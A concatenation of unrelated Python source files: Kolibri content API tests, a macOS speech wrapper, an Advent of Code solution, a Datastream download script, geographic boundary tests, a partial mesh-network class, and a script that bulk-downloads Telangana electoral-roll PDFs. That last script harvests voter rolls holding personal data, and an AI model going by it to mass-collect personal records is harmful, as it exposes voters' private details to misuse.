self.assertEqual(get_progress_fraction(c2), 0)
self.assertEqual(get_progress_fraction(c2c1), 0)
# check that progress is calculated appropriately when user is logged in
self.client.login(username="learner", password="pass", facility=facility)
response = self.client.get(reverse("kolibri:core:contentnodeprogress-list"))
# The progress endpoint is used, so should report progress for topics
self.assertEqual(get_progress_fraction(root), 0.24)
self.assertEqual(get_progress_fraction(c1), 0)
self.assertEqual(get_progress_fraction(c2), 0.4)
self.assertEqual(get_progress_fraction(c2c1), 0.7)
def test_filtering_coach_content_anon(self):
response = self.client.get(
reverse("kolibri:core:contentnode-list"),
data={"include_coach_content": False},
)
        # TODO: make the content_test.json fixture more organized; for now we just hardcode the correct count
self.assertEqual(len(response.data), 7)
def test_filtering_coach_content_admin(self):
self.client.login(username=self.admin.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-list"),
data={"include_coach_content": True},
)
expected_output = content.ContentNode.objects.exclude(
available=False
).count() # coach_content node should be returned
self.assertEqual(len(response.data), expected_output)
def test_copies(self):
# the pk is actually a content id
response = self.client.get(
reverse(
"kolibri:core:contentnode-copies",
kwargs={"pk": "c6f49ea527824f398f4d5d26faf19396"},
)
)
expected_titles = set(["root", "c1", "copy"])
response_titles = set()
for node in response.data[0]:
response_titles.add(node["title"])
self.assertSetEqual(expected_titles, response_titles)
def test_available_copies(self):
# the pk is actually a content id
response = self.client.get(
reverse(
"kolibri:core:contentnode-copies",
kwargs={"pk": "f2332710c2fd483386cdeb5dcbdda81a"},
)
)
# no results should be returned for unavailable content node
self.assertEqual(len(response.data), 0)
def test_copies_count(self):
response = self.client.get(
reverse("kolibri:core:contentnode-copies-count"),
data={
"content_ids": "f2332710c2fd483386cdeb5dcbdda81f,c6f49ea527824f398f4d5d26faf15555,f2332710c2fd483386cdeb5dcbdda81a"
},
)
# assert non existent content id does not show up in results
# no results should be returned for unavailable content node
self.assertEqual(len(response.data), 1)
self.assertEqual(
response.data[0]["count"],
content.ContentNode.objects.filter(
content_id="f2332710c2fd483386cdeb5dcbdda81f"
).count(),
)
def test_search_total_results(self):
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "root"}
)
self.assertEqual(response.data["total_results"], 1)
def test_search_kinds(self):
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "root"}
)
self.assertEqual(list(response.data["content_kinds"]), [content_kinds.TOPIC])
def test_search_repeated_kinds(self):
# Ensure that each kind is only returned once.
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "c"}
)
kinds = response.data["content_kinds"][:]
self.assertEqual(len(kinds), len(set(kinds)))
def test_search_channels(self):
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "root"}
)
self.assertEqual(response.data["channel_ids"][:], [self.the_channel_id])
def test_search_repeated_channels(self):
# Ensure that each channel_id is only returned once.
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "c"}
)
channel_ids = response.data["channel_ids"][:]
self.assertEqual(len(channel_ids), len(set(channel_ids)))
def test_search(self):
        # ensure search returns no results when the query contains no searchable words
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "!?,"}
)
self.assertEqual(len(response.data["results"]), 0)
        # ensure search returns no results when the query contains only stopwords
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "or"}
)
self.assertEqual(len(response.data["results"]), 0)
# regular search
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "root"}
)
self.assertEqual(len(response.data["results"]), 1)
def _create_session_logs(self):
content_ids = (
"f2332710c2fd483386cdeb5ecbdda81f",
"ce603df7c46b424b934348995e1b05fb",
"481e1bda1faa445d801ceb2afbd2f42f",
)
channel_id = "6199dde695db4ee4ab392222d5af1e5c"
[
ContentSessionLog.objects.create(
channel_id=channel_id,
content_id=content_ids[0],
start_timestamp=timezone.now(),
kind="audio",
)
for _ in range(50)
]
[
ContentSessionLog.objects.create(
channel_id=channel_id,
content_id=content_ids[1],
start_timestamp=timezone.now(),
kind="exercise",
)
for _ in range(25)
]
[
ContentSessionLog.objects.create(
channel_id=channel_id,
content_id=content_ids[2],
start_timestamp=timezone.now(),
kind="document",
)
for _ in range(1)
]
# create log for non existent content id
# should not show up in api response
ContentSessionLog.objects.create(
channel_id=uuid.uuid4().hex,
content_id=uuid.uuid4().hex,
start_timestamp=timezone.now(),
kind="content",
)
return content_ids
def test_popular(self):
expected_content_ids = self._create_session_logs()
response = self.client.get(reverse("kolibri:core:contentnode-popular"))
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_popular_no_coach_content(self):
expected_content_ids = self._create_session_logs()
node = content.ContentNode.objects.get(content_id=expected_content_ids[0])
node.coach_content = True
node.save()
expected_content_ids = expected_content_ids[1:]
response = self.client.get(
reverse("kolibri:core:contentnode-popular"),
data={"include_coach_content": False},
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_popular_coach_has_coach_content(self):
coach = FacilityUser.objects.create(username="coach", facility=self.facility)
coach.set_password(DUMMY_PASSWORD)
coach.save()
self.facility.add_coach(coach)
expected_content_ids = self._create_session_logs()
node = content.ContentNode.objects.get(content_id=expected_content_ids[0])
node.coach_content = True
node.save()
self.client.login(username="coach", password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-popular"),
data={"include_coach_content": True},
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_popular_ten_minute_cache(self):
self._create_session_logs()
response = self.client.get(reverse("kolibri:core:contentnode-popular"))
self.assertEqual(response["Cache-Control"], "max-age=600")
def _create_summary_logs(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
content_ids = ("f2332710c2fd483386cdeb5ecbdda81f",)
channel_id = "6199dde695db4ee4ab392222d5af1e5c"
ContentSummaryLog.objects.create(
channel_id=channel_id,
content_id=content_ids[0],
user_id=user.id,
start_timestamp=timezone.now(),
kind="audio",
)
# create log with progress of 1
# should not show up in api response
ContentSummaryLog.objects.create(
channel_id=channel_id,
content_id="ce603df7c46b424b934348995e1b05fb",
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
# create log for non existent content id
# should not show up in api response
ContentSummaryLog.objects.create(
channel_id=uuid.uuid4().hex,
content_id=uuid.uuid4().hex,
user_id=user.id,
start_timestamp=timezone.now(),
kind="content",
)
user.set_password(DUMMY_PASSWORD)
user.save()
return user, content_ids
def test_resume(self):
user, expected_content_ids = self._create_summary_logs()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-resume", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_resume_wrong_id(self):
user, expected_content_ids = self._create_summary_logs()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-resume", kwargs={"pk": "wrong"})
)
response_content_ids = [node["content_id"] for node in response.json()]
self.assertEqual([], response_content_ids)
def test_resume_zero_cache(self):
user, expected_content_ids = self._create_summary_logs()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-resume", kwargs={"pk": user.id})
)
self.assertEqual(response["Cache-Control"], "max-age=0")
def test_next_steps_prereq(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
root = content.ContentNode.objects.get(title="root")
ContentSummaryLog.objects.create(
channel_id=root.channel_id,
content_id=root.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
post_req = root.prerequisite_for.first()
expected_content_ids = (post_req.content_id,)
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_next_steps_prereq_zero_cache(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
root = content.ContentNode.objects.get(title="root")
ContentSummaryLog.objects.create(
channel_id=root.channel_id,
content_id=root.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
self.assertEqual(response["Cache-Control"], "max-age=0")
def test_next_steps_prereq_wrong_id(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
root = content.ContentNode.objects.get(title="root")
ContentSummaryLog.objects.create(
channel_id=root.channel_id,
content_id=root.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": "wrong"})
)
response_content_ids = [node["content_id"] for node in response.json()]
self.assertEqual([], response_content_ids)
def test_next_steps_prereq_in_progress(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
root = content.ContentNode.objects.get(title="root")
ContentSummaryLog.objects.create(
channel_id=root.channel_id,
content_id=root.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
post_req = root.prerequisite_for.first()
ContentSummaryLog.objects.create(
channel_id=post_req.channel_id,
content_id=post_req.content_id,
user_id=user.id,
progress=0.5,
start_timestamp=timezone.now(),
kind="audio",
)
expected_content_ids = []
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_next_steps_prereq_coach_content_not_coach(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
root = content.ContentNode.objects.get(title="root")
ContentSummaryLog.objects.create(
channel_id=root.channel_id,
content_id=root.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
post_req = root.prerequisite_for.first()
post_req.coach_content = True
post_req.save()
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(), response_content_ids)
def test_next_steps_prereq_coach_content_coach(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
facility.add_coach(user)
root = content.ContentNode.objects.get(title="root")
ContentSummaryLog.objects.create(
channel_id=root.channel_id,
content_id=root.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
post_req = root.prerequisite_for.first()
post_req.coach_content = True
post_req.save()
expected_content_ids = (post_req.content_id,)
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_next_steps_sibling(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
node = content.ContentNode.objects.get(
content_id="ce603df7c46b424b934348995e1b05fb"
)
ContentSummaryLog.objects.create(
channel_id=node.channel_id,
content_id=node.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
sibling = node.get_next_sibling()
expected_content_ids = (sibling.content_id,)
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_next_steps_sibling_in_progress(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
node = content.ContentNode.objects.get(
content_id="ce603df7c46b424b934348995e1b05fb"
)
ContentSummaryLog.objects.create(
channel_id=node.channel_id,
content_id=node.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
sibling = node.get_next_sibling()
ContentSummaryLog.objects.create(
channel_id=sibling.channel_id,
content_id=sibling.content_id,
user_id=user.id,
progress=0.5,
start_timestamp=timezone.now(),
kind="audio",
)
expected_content_ids = []
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_next_steps_sibling_coach_content_not_coach(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
node = content.ContentNode.objects.get(
content_id="ce603df7c46b424b934348995e1b05fb"
)
ContentSummaryLog.objects.create(
channel_id=node.channel_id,
content_id=node.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
sibling = node.get_next_sibling()
sibling.coach_content = True
sibling.save()
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(), response_content_ids)
def test_next_steps_sibling_coach_content_coach(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
facility.add_coach(user)
node = content.ContentNode.objects.get(
content_id="ce603df7c46b424b934348995e1b05fb"
)
ContentSummaryLog.objects.create(
channel_id=node.channel_id,
content_id=node.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
sibling = node.get_next_sibling()
sibling.coach_content = True
sibling.save()
expected_content_ids = (sibling.content_id,)
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def tearDown(self):
"""
clean up files/folders created during the test
"""
cache.clear()
super(ContentNodeAPITestCase, self).tearDown()
def mock_patch_decorator(func):
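    # Replaces requests.get with a mock whose .json() returns a canned Studio channel
    # list ([{"id": 1, "name": "studio"}]) for the duration of the wrapped test.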
def wrapper(*args, **kwargs):
mock_object = mock.Mock()
mock_object.json.return_value = [{"id": 1, "name": "studio"}]
with mock.patch.object(requests, "get", return_value=mock_object):
return func(*args, **kwargs)
return wrapper
class KolibriStudioAPITestCase(APITestCase):
@classmethod
def setUpTestData(cls):
DeviceSettings.objects.create(is_provisioned=True)
cls.facility = Facility.objects.create(name="facility")
superuser = FacilityUser.objects.create(
username="superuser", facility=cls.facility
)
superuser.set_password(DUMMY_PASSWORD)
superuser.save()
cls.superuser = superuser
DevicePermissions.objects.create(user=superuser, is_superuser=True)
def setUp(self):
self.client.login(username=self.superuser.username, password=DUMMY_PASSWORD)
@mock_patch_decorator
def test_channel_list(self):
response = self.client.get(
reverse("kolibri:core:remotechannel-list"), format="json"
)
self.assertEqual(response.data[0]["id"], 1)
@mock_patch_decorator
def test_channel_retrieve_list(self):
response = self.client.get(
reverse("kolibri:core:remotechannel-retrieve-list", kwargs={"pk": 1}),
format="json",
)
self.assertEqual(response.data[0]["id"], 1)
@mock_patch_decorator
def test_no_permission_non_superuser_channel_list(self):
user = FacilityUser.objects.create(username="user", facility=self.facility)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.logout()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:remotechannel-list"), format="json"
)
self.assertEqual(response.status_code, 403)
@mock_patch_decorator
def test_channel_retrieve(self):
response = self.client.get(
reverse("kolibri:core:remotechannel-detail", kwargs={"pk": "abc"}),
format="json",
)
self.assertEqual(response.data["name"], "studio")
@mock_patch_decorator
def test_channel_info_404(self):
mock_object = mock.Mock()
mock_object.status_code = 404
requests.get.return_value = mock_object
response = self.client.get(
reverse("kolibri:core:remotechannel-detail", kwargs={"pk": "abc"}),
format="json",
)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def tearDown(self):
cache.clear()
| indirectlylit/kolibri | kolibri/core/content/test/test_content_app.py | Python | mit | 72,718 |
import os
import re
import subprocess
from utils import whereis_exe
class osx_voice():
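    # Parses one line of `say -v ?` output, which looks roughly like
    #   Alex                en_US    # Most people recognize me by my voice.
    # into a voice name, a locality and a human-readable description.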
def __init__(self, voice_line):
mess = voice_line.split(' ')
cleaned = [ part for part in mess if len(part)>0 ]
self.name = cleaned[0]
self.locality = cleaned[1]
        self.desc = ' '.join(cleaned[2:]).replace('# ', '')
def __str__(self):
return self.name + ' ' + self.locality + ' ' + self.desc
def fetch_voices():
osx_voices = []
if whereis_exe("say"):
voices_raw = os.popen("say -v ?").read()
voice_lines = voices_raw.split('\n')
for line in voice_lines:
try:
osx_voices.append(osx_voice(line))
except IndexError:
pass
return osx_voices
def speak(text, voice, rate):
if whereis_exe("say"):
subprocess.call(["say", text, "-v", voice, "-r", rate])
| brousch/saythis2 | tts_engines/osx_say.py | Python | mit | 888 |
import urllib2
import os
baseurl = "http://ceoaperms.ap.gov.in/TS_Rolls/PDFGeneration.aspx?urlPath=D:\SSR2016_Final\Telangana\AC_001\English\S29A"
constituencyCount = 0
constituencyTotal = 229
while constituencyCount <= constituencyTotal:
pdfCount = 1
notDone = True
constituencyCount = constituencyCount + 1
while notDone:
        #example URL: http://ceoaperms.ap.gov.in/TS_Rolls/PDFGeneration.aspx?urlPath=D:\SSR2016_Final\Telangana\AC_001\English\S29A001P001.PDF
url = baseurl+str(constituencyCount).zfill(2)+'P'+str(pdfCount).zfill(3)+".pdf"
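        # Pages are probed sequentially (P001, P002, ...) for each constituency; the
        # inner loop stops at the first URL that is missing or not served as a PDF.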
pdfCount = pdfCount + 1
try:
u = urllib2.urlopen(url)
response_headers = u.info()
if response_headers.type == 'application/pdf':
directory = "Path to dir" + str(constituencyCount).zfill(3) + "/"
try:
os.makedirs(directory)
except OSError:
pass # already exists
file_name = directory + url.split('/')[-1]
u = urllib2.urlopen(url)
f = open(file_name, 'wb')
meta = u.info()
file_size = int(meta.getheaders("Content-Length")[0])
print "Downloading: %s Bytes: %s" % (file_name, file_size)
file_size_dl = 0
block_sz = 8192
while True:
buffer = u.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl * 100. / file_size)
status = status + chr(8)*(len(status)+1)
print status,
f.close()
else:
notDone = False
except urllib2.URLError, e:
if e.code == 404:
notDone = False
| abhishek-malani/python-basic-coding | python-basic-coding/python-basic-coding/voter_data_download.py | Python | mit | 1,936 |
#!/usr/bin/env python3
# Advent of Code 2016 - Day 7, Part One
import sys
import re
from itertools import islice
def window(seq, n=2):
"Returns a sliding window (of width n) over data from the iterable"
" s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... "
it = iter(seq)
result = tuple(islice(it, n))
if len(result) == n:
yield result
for elem in it:
result = result[1:] + (elem,)
yield result
def has_abba(string):
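    # An "ABBA" is a four-character run that mirrors itself using two distinct
    # characters, e.g. has_abba("xabbay") is True while has_abba("aaaa") is False.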
for s in window(string, 4):
if s[:2] == s[:1:-1] and s[0] != s[1]:
return True
return False
def main(argv):
if len(argv) < 2:
print("Usage: day07-pt1.py puzzle.txt")
return 1
valid = 0
with open(argv[1]) as f:
for line in f:
            nets = re.split(r'[\[\]]', line.strip())
if any(has_abba(s) for s in nets[::2]) \
and not any(has_abba(h) for h in nets[1::2]):
valid += 1
print(valid)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| mcbor/adventofcode | 2016/day07/day07-pt1.py | Python | mit | 1,067 |
from pydatastream import Datastream
import json
import datetime
import sys
import os.path
#hardcoded directories
dir_input = "input/"
dir_output = "output/"
#check that the login credentials and input file location are being passed in
numOfArgs = len(sys.argv) - 1
if numOfArgs != 3:
print "Please run this python script with username,password and input file location in that order respectively."
exit()
#Setup login credentials and input file location
username = str(sys.argv[1])
pw = str(sys.argv[2])
input_file_loc = dir_input + str(sys.argv[3])
#Ensure that the input file location exists
if ( not os.path.isfile(str(input_file_loc)) ):
print "The file " + str(input_file_loc) + " does not exist."
exit()
#login credentials to datastream
DWE = Datastream(username=username,password=pw)
#other info from datastream
info = DWE.system_info()
subscribed_sources = DWE.sources()
#replace missing data with NaNs
DWE.raise_on_error = False
#get all codes, groups, start dates from input file
with open(input_file_loc,'r') as input_file:
symbol_ref = json.load(input_file)
#download timestamp
download_date = {'Custom_Download_Date' : datetime.datetime.now().isoformat()}
#calculate time taken for entire process
time_taken = datetime.datetime.now()
time_taken = time_taken - time_taken
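#the nested loops below expect the input JSON to be shaped roughly as
#{description: {group: {code_key: {"code": ..., "start_date": ..., "custom_field": ...}}}}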
for desc,desc_value in symbol_ref.iteritems():
for group,group_value in desc_value.iteritems():
#create list for custom fields
custom_fields = list()
for code_key,code_value in group_value.iteritems():
for key,value in code_value.iteritems():
if(key == 'code'):
search_code = value
search_symbol = {'Custom_Ticker' : value}
if(key == 'start_date'):
start_date = value
if(key == 'custom_field'):
custom_fields[:] = []
custom_fields.append(value)
startTime = datetime.datetime.now()
#send request to retrieve the data from Datastream
req = DWE.fetch(str(search_code),custom_fields,date_from=str(start_date),only_data=False)
time_taken = time_taken + datetime.datetime.now() - startTime
#format date and convert to json
raw_json = req[0].to_json(date_format='iso')
raw_metadata = req[1].to_json()
#Data cleaning and processing
#remove the time component including the '.' char from the key values of datetime in the data
raw_json = raw_json.replace("T00:00:00.000Z","")
#replace the metadata's keys from "0" to "default_ws_key"
raw_metadata = raw_metadata.replace("\"0\"","\"Custom_WS_Key\"")
#combine the data and the metadata about the code
allData_str = json.loads(raw_json)
metadata_str = json.loads(raw_metadata)
datastream_combined = {key : value for (key,value) in (allData_str.items() + metadata_str.items())}
#create symbol json string and append to data
data_with_symbol = {key : value for (key,value) in (search_symbol.items() + datastream_combined.items())}
#append group
group_code = {'Custom_Group' : group}
data_with_group = {key : value for (key,value) in (group_code.items() + data_with_symbol.items())}
#append category
category = {'Custom_Description' : desc}
data_with_category = {key : value for (key,value) in (category.items() + data_with_group.items())}
#append download timestamp
final_data = {key : value for (key,value) in (download_date.items() + data_with_category.items())}
final_data_json = json.dumps(final_data)
#decode to the right format for saving to disk
json_file = json.JSONDecoder().decode((final_data_json))
#save to json file on server
if(len(group_value) > 1):
filename = dir_output + desc + '_' + group + '_' + code_key + '.json'
else:
filename = dir_output + desc + '_' + group + '.json'
with open(filename,'w') as outfile:
json.dump(json_file,outfile,sort_keys=True)
print "time taken for " + str(sys.argv[3]) + " to be retrieved: " + str(time_taken)
| jinser/automate_pydatastream | getcustom.py | Python | mit | 3,917 |
"""Unit tests for conus_boundary.py."""
import unittest
import numpy
from gewittergefahr.gg_utils import conus_boundary
QUERY_LATITUDES_DEG = numpy.array([
33.7, 42.6, 39.7, 34.9, 40.2, 33.6, 36.4, 35.1, 30.8, 47.4, 44.2, 45.1,
49.6, 38.9, 35.0, 38.1, 40.7, 47.1, 30.2, 39.2
])
QUERY_LONGITUDES_DEG = numpy.array([
276.3, 282.7, 286.6, 287.5, 271.0, 266.4, 258.3, 257.3, 286.8, 235.0, 273.5,
262.5, 277.2, 255.3, 271.8, 254.3, 262.1, 247.8, 262.9, 251.6
])
IN_CONUS_FLAGS = numpy.array(
[1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1], dtype=bool
)
class ConusBoundaryTests(unittest.TestCase):
"""Each method is a unit test for conus_boundary.py."""
def test_find_points_in_conus_no_shortcuts(self):
"""Ensures correct output from find_points_in_conus.
In this case, does not use shortcuts.
"""
conus_latitudes_deg, conus_longitudes_deg = (
conus_boundary.read_from_netcdf()
)
these_flags = conus_boundary.find_points_in_conus(
conus_latitudes_deg=conus_latitudes_deg,
conus_longitudes_deg=conus_longitudes_deg,
query_latitudes_deg=QUERY_LATITUDES_DEG,
query_longitudes_deg=QUERY_LONGITUDES_DEG, use_shortcuts=False)
self.assertTrue(numpy.array_equal(these_flags, IN_CONUS_FLAGS))
def test_find_points_in_conus_with_shortcuts(self):
"""Ensures correct output from find_points_in_conus.
In this case, uses shortcuts.
"""
conus_latitudes_deg, conus_longitudes_deg = (
conus_boundary.read_from_netcdf()
)
these_flags = conus_boundary.find_points_in_conus(
conus_latitudes_deg=conus_latitudes_deg,
conus_longitudes_deg=conus_longitudes_deg,
query_latitudes_deg=QUERY_LATITUDES_DEG,
query_longitudes_deg=QUERY_LONGITUDES_DEG, use_shortcuts=True)
self.assertTrue(numpy.array_equal(these_flags, IN_CONUS_FLAGS))
if __name__ == '__main__':
unittest.main()
| thunderhoser/GewitterGefahr | gewittergefahr/gg_utils/conus_boundary_test.py | Python | mit | 2,046 |
#!/usr/bin/python3.3
import somnTCP
import somnUDP
import somnPkt
import somnRouteTable
from somnLib import *
import struct
import queue
import threading
import socket
import time
import random
PING_TIMEOUT = 5
class somnData():
def __init__(self, ID, data):
self.nodeID = ID
self.data = data
class somnMesh(threading.Thread):
TCPTxQ = queue.Queue()
TCPRxQ = queue.Queue()
UDPRxQ = queue.Queue()
UDPAlive = threading.Event()
networkAlive = threading.Event()
routeTable = somnRouteTable.somnRoutingTable()
cacheId = [0,0,0,0]
cacheRoute = [0,0,0,0]
cacheNextIndex = 0
_mainLoopRunning = 0
enrolled = False
nodeID = 0
nodeIP = "127.0.0.1"
nodePort = 0
lastEnrollReq = 0
connCache = [('',0),('',0),('',0)]
_printCallbackFunction = None
def __init__(self, TxDataQ, RxDataQ, printCallback = None):
threading.Thread.__init__(self)
self.CommTxQ = TxDataQ
self.CommRxQ = RxDataQ
random.seed()
self.nodeID = random.getrandbits(16)
self.nextConnCacheIndex = 0
self._printCallbackFunction = printCallback
TCPTxQ = queue.Queue()
TCPRxQ = queue.Queue()
UDPRxQ = queue.Queue()
self.pendingRouteID = 0
self.pendingRoute = 0
self.pendingRouteHTL = 1
self.routeLock = threading.Lock()
self.routeBlock = threading.Event()
self.pingTimer = threading.Timer(random.randrange(45,90), self._pingRouteTable)
self.pingCache = [0,0,0,0,0]
self.pingLock = threading.Lock()
def printinfo(self, outputStr):
if self._printCallbackFunction == None:
print("{0:04X}: {1}".format(self.nodeID, outputStr))
else:
self._printCallbackFunction(self.nodeID, outputStr)
def enroll(self):
#self.printinfo("enrolling")
tcpRespTimeout = False
ACK = random.getrandbits(16)
enrollPkt = somnPkt.SomnPacket()
enrollPkt.InitEmpty("NodeEnrollment")
enrollPkt.PacketFields['ReqNodeID'] = self.nodeID
enrollPkt.PacketFields['ReqNodeIP'] = IP2Int(self.nodeIP)
enrollPkt.PacketFields['ReqNodePort'] = self.nodePort
enrollPkt.PacketFields['AckSeq'] = ACK
udp = somnUDP.somnUDPThread(enrollPkt, self.UDPRxQ, self.networkAlive, self.UDPAlive)
udp.start()
while not tcpRespTimeout and self.routeTable.getNodeCount() < 3:
try:
enrollResponse = self.TCPRxQ.get(timeout = 1)
except queue.Empty:
tcpRespTimeout = True
break
respNodeID = enrollResponse.PacketFields['RespNodeID']
respNodeIP = enrollResponse.PacketFields['RespNodeIP']
respNodePort = enrollResponse.PacketFields['RespNodePort']
#self.printinfo("Got enrollment response from {0:04X}".format(respNodeID))
self.routeTable.getNodeIndexFromId(respNodeID)
if self.routeTable.getNodeIndexFromId(respNodeID) > 0:
self.TCPRxQ.task_done()
continue
elif enrollResponse.PacketType == somnPkt.SomnPacketType.NodeEnrollment and enrollResponse.PacketFields['AckSeq'] == ACK:
if self.routeTable.addNode(respNodeID, Int2IP(respNodeIP), respNodePort) < 0:
self.printinfo("Something went wrong in adding the node")
#TODO: Can we make this an exception?
packedEnrollResponse = somnPkt.SomnPacketTxWrapper(enrollResponse, Int2IP(respNodeIP),respNodePort)
self.TCPTxQ.put(packedEnrollResponse)
self.enrolled = True
self.printinfo("Enrolled to: {0:04X}".format(respNodeID))
self.TCPRxQ.task_done()
#break
return udp
def run(self):
socket.setdefaulttimeout(5)
self.networkAlive.set()
Rx = somnTCP.startSomnRx(self.nodeIP, self.nodePort, self.networkAlive, self.TCPRxQ)
Tx = somnTCP.startSomnTx(self.networkAlive, self.TCPTxQ)
while True:
if Rx.bound and Tx.bound: break
self.nodePort = Rx.port
#self.printinfo("Port: {0}".format(self.nodePort))
enrollAttempts = 0
while not self.enrolled:
self.UDPAlive.set()
UDP = self.enroll()
if self.enrolled:
break
elif enrollAttempts < 2:
self.UDPAlive.clear()
UDP.join()
enrollAttempts = enrollAttempts + 1
else:
self.enrolled = True
self.printinfo("Enrolled as Alpha Node")
break
#start main loop to handle incoming queueus
self._mainLoopRunning = 1
rxThread = threading.Thread(target = self._handleTcpRx)
rxThread.start()
self.pingTimer.start()
while self._mainLoopRunning:
self._handleUdpRx()
self._handleTx()
# Do a bunch of stuff
try:
self.pingTimer.cancel()
except:
pass
